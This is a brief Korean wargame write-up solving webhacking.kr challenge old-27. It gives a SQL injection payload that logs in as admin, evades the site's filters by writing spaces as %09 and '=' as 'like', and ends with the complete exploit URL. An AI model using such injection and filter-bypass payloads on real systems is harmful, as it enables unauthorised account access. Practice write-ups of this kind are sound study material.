[Webhacking.kr] old-27
Wargame/webhacking.kr
https://webhacking.kr/challenge/web-12/ no에 2) or id='admin'--를 넣으면 전체 쿼리는 아래와 같다. select id from chall27 where id='guest' and no=(2) or id='admin'-- ) 그러면 admin으로 로그인할 수 있다. 공백은 %09로, =는 like로 우회할 수 있다. 따라서 아래 URL로 접속하면 문제가 풀린다. https://webhacking.kr/challenge/web-12/index.php?no=2)%09or%09id%09like%09%27admin%27--%09